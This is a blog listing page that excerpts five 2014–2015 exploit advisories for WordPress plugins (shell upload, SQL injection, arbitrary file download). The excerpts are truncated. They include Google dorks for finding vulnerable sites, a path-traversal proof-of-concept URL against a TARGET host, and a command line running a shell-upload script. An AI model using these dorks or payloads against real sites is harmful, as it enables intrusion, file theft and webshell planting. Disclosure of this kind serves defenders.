bug | HomeLab IT

WordPress Work the flow file upload 2.5.2 Shell Upload Vulnerability

###################### # Exploit Title : WordPress Work the flow file upload 2.5.2 Shell Upload Vulnerability # Exploit Author : Claudio Viviani # Software Link : https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip # Date : 2015-03-14 # Tested on : Linux BackBox 4.0 / curl 7.35.0 ###################### # Description: Work the Flow File Upload. Embed Html5 User File Uploads and Workflows into pages and posts. Multiple file Drag and Drop upload, Image Gallery display, Reordering and Archiving....

WordPress Video Gallery 2.7 SQL Injection

###################### # Exploit Title : WordPress Video Gallery 2.7 SQL Injection Vulnerabilitiy # Exploit Author : Claudio Viviani # Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery # Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.7.zip # Dork Google: inurl:/wp-admin/admin-ajax.php?action=rss # Date : 2015-02-10 # Tested on : Windows 7 / Mozilla Firefox Linux / Mozilla Firefox ###################### # Vulnerability Disclosure Timeline: 2015-02-08: Discovered vulnerability 2015-02-09: Vendor Notification 2015-02-10: Vendor Response/Feedback 2015-02-10: Vendor Send Fix/Patch 2015-02-10: Public Disclosure # Description Wordpress Video Gallery 2....

WordPress WP Symposium Shell Upload Vulnerability

___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | `--- ---' ___ ___ _______ _______ __ | Y | _ |______| _ .--.--.--------.-----.-----.-----|__.--.--.--------. |. | |. 1 |______| 1___| | | | _ | _ |__ --| | | | | |. / \ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__| |: |: | |: 1 |_____| |__| |::....

WordPress Ajax Store Locator Arbitrary File Download Vulnerability

###################### # Exploit Title : WordPress Ajax Store Locator <= 1.2 Arbitrary File Download # Exploit Author : Claudio Viviani # Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356 # Software Link : Premium # Dork Google: inurl:ajax-store-locator # index of ajax-store-locator # Date : 2014-12-06 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox ###################### # PoC Exploit: http://TARGET/wp-content/plugins/ajax-store-locator-wordpress/sl_file_download.php?download_file=[../../nomefile] or http://TARGET/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=[../../nomefile] "download_file" variable is not sanitized. ##################### Discovered By : Claudio Viviani http://www....

WordPress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability

claudio@backbox3:~/claudio$ python wpdatatables_shell_up.py -t http://10.0.0.67/wordpress -f shell.php ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | `--- ---' ___ ___ ______ __ _______ __ __ | Y .-----| _ \ .---.-| |_.---.-| .---.-| |--| .-----.-----. |. | | _ |. | \| _ | _| _ |....